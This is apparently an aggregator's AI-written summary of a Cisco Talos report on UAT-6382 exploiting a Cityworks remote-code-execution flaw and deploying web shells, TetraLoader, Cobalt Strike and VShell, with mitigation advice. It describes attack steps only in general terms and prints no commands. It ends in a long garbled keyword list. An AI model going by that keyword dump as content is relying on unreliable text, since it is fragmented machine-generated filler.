Cisco Talos Blog: UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware

May 22, 2025

—

Source URL: https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/
Source: Cisco Talos Blog
Title: UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware

Feedly Summary: Talos has observed exploitation of CVE-2025-0994 in the wild by UAT-6382, a Chinese-speaking threat actor, who then deployed malware payloads via TetraLoader.

AI Summary and Description: Yes

**Summary:** The text describes the exploitation of a significant remote-code-execution vulnerability (CVE-2025-0994) in Cityworks, revealing a sophisticated attack campaign allegedly conducted by Chinese-speaking threat actors. It highlights the use of various malware types and their implications for infrastructure security, particularly within local government networks.

**Detailed Description:**
– **Vulnerability Overview:**
– CVE-2025-0994 is a critical remote-code-execution vulnerability in Cityworks, an asset management system.
– Cisco Talos, alongside advisories from CISA and Trimble, has identified exploitation of this vulnerability.

– **Threat Actor Profile:**
– The attack group, dubbed UAT-6382, is assessed to be comprised of Chinese-speaking actors.
– They utilize a variety of tactics, techniques, and procedures (TTPs), including the rapid deployment of web shells and use of Rust-based malware.

– **Technical Analysis:**
– The attackers have demonstrated advanced capabilities by deploying multiple web shells (e.g., AntSword, chinatso).
– Notable tools include:
– **TetraLoader:** A Rust-based loader that injects payloads into benign processes.
– **Cobalt Strike Beacons:** Positioned to facilitate command and control (C2) operations.
– **VShell:** A GoLang-based implant used for remote access.

– **Intrusion Details:**
– Initial reconnaissance led to the installation of backdoors and malware on compromised systems.
– Notable commands used for enumeration and staging:
– `cmd.exe` commands for directory listing and file operations.
– PowerShell commands for malicious downloads from external servers.

– **Indicators of Compromise (IOCs):**
– Specific hashes for TetraLoader and Cobalt Strike beacons are provided.
– Domain names and associated malicious URLs are listed, demonstrating the breadth of the attack infrastructure.

– **Mitigation Recommendations:**
– Suggested mitigative measures include:
– Implementation of Cisco Secure Endpoint and other Cisco security solutions.
– Use of multi-factor authentication (Cisco Duo).
– Continuous monitoring of network traffic (Cisco Secure Network/Cloud Analytics).

– **Conclusion:**
– This campaign highlights the necessity for heightened vigilance and advanced security frameworks in protecting vulnerable infrastructure, specifically within public sector environments dealing with utility and management systems.

**Key Implications for Security Professionals:**
– Organizations must stay updated on vulnerabilities and employ proactive security measures to defend against sophisticated threat actor tactics.
– Integrating detection and response capabilities inherent in advanced threat protection solutions is critical for mitigating potential risks associated with such targeted attacks.

2 2025 3 4 5 a access Act ads advanced capabilities advanced security Advanced Threat Protection advisories AGI AI alt analysis analytics and API art as asset management attack attackers attacks authentication backdoor backdoors based based malware Bi by C C2 capabilities China Chinese CI CIA CISA Cisco Cisco Talos Cloud cloud analytics co Cobalt Strike code command compromised compromised systems continuous monitoring control critical CVE D day day vulnerability de demo deployment detection domain domain names e end endpoint enumeration environment execution exp exploit Exploitation exploits External external server fact factor authentication file for framework frameworks g Gen Go Golang government government networks Group gs H high Highlight HR http HTTPS implementation implications implications for security in indicators of compromise infrastructure infrastructure security installation Intel intelligence io IoC IoCs Iron J k Key l led Li Loader local long M malware man management Management System measures mitigation mitigation recommendations Monitor monitoring multi multi-factor authentication N network network traffic networks no o of on one operation operations organization organizations ory oS OSINT over phi point potential potential risks Power PowerShell PowerShell commands proactive proactive security proactive security measures procedures process processes professionals protection public public sector Q R rapid deployment rate RCE recommendations reconnaissance remote Remote Access response response capabilities Risk risks Ro RoT Rust s sec sector secure security security framework security frameworks security measure security measures security professionals security solutions server servers shell commands side Sig SoC solutions source speaking specific SSE SSO system systems T tactics Tails Talos targeted targeted attacks tech techniques text the threat threat actor threat actors Threat Protection threat protection solutions to tool tools Tor TP traffic Trimble two type up update US use uth V vigilance vulnerabilities vulnerability Ware web web shell web shells Wi x zero zero-day zero-day vulnerability